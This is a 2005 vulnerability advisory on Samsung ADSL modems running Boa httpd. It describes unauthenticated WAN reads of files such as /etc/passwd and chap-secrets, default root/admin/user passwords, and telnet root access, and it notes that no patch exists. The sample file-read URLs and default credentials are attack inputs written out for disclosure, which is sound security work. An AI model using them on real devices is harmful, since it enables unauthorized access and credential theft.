------------------------------------------------------------ - EXPL-A-2005-002 exploitlabs.com Advisory 031 - ------------------------------------------------------------ - Samsung ADSL Modem - AFFECTED PRODUCTS ================= Samsung ADSL Modem Samsung Eletronics http://www.samsung.com DETAILS ======= All items are via WAN by default 1. Arbitrary reading of files 2. Default root password 3. root file system access Known issues exist in Boa httpd as per: FreeBSD-SA-00:60 Security Advisory http://www.securiteam.com/unixfocus/6G0081P0AI.html and http://lists.insecure.org/lists/bugtraq/2000/Oct/0445.html note: This is a hardware based product with built in httpd for remote access, this is a seperate issue than the ones formaly presented above, but carry the same implications. Identification: HTTP/1.0 400 Bad Request Date: Sat, 03 Jan 1970 17:57:18 GMT Server: Boa/0.93.15 Connection: close Content-Type: text/html Modem vendor Samsung Electronics (co) modem co chipset vendor b500545354430002 cpe chipset vendor Samsung Electronics (co) cpe chipset software version SMDK8947v1.2 Jul 11 2003 10:00:01 ADSL DMT version a-110.030620-10130710 Samsung ADSL modems run uClinux OS http://www.uclinux.com note: Depending on the implimentation, other products using a combination of Boa / uClinux may be affected as well. Item 1 --------- http://[someSamsung.ip]/etc/passwd http://[someSamsung.ip]/etc/hosts http://[someSamsung.ip]/bin/ http://[someSamsung.ip]/dev/ http://[someSamsung.ip]/lib/ http://[someSamsung.ip]/tmp/ http://[someSamsung.ip]/var/ppp/chap-secrets http://[someSamsung.ip]/bin/sh Any remote user may request any file present in the router/modem OS file system via WAN. Files can be fetched unauthenticated via a GET request in a browser. Item 2 ====== Default user login / passwords exist in both httpd ( http://[host]/cgi-bin/adsl.cgi) and telnet ports root/root admin/admin user/user Item 3 ====== By telneting to the device and loging in as root/root, remote users may access the filesystem. The modem provides 256mb of ram for OS and file system operations. In this implimentation there is aprox 120mb free file system space which allows for the posibility for remote attackers to use the file system for malicious communication and file storage. This allows many scenarios such as a storing worm and/or viral code. #echo "some bad data" >file SOLUTION: ========= none to date Samsung has been contacted No patch released Credits ======= This vulnerability was discovered and researched by Donnie Werner of exploitlabs Donnie Werner mail: morning_wood@zone-h.org -- web: http://exploitlabs.com web: http://zone-h.org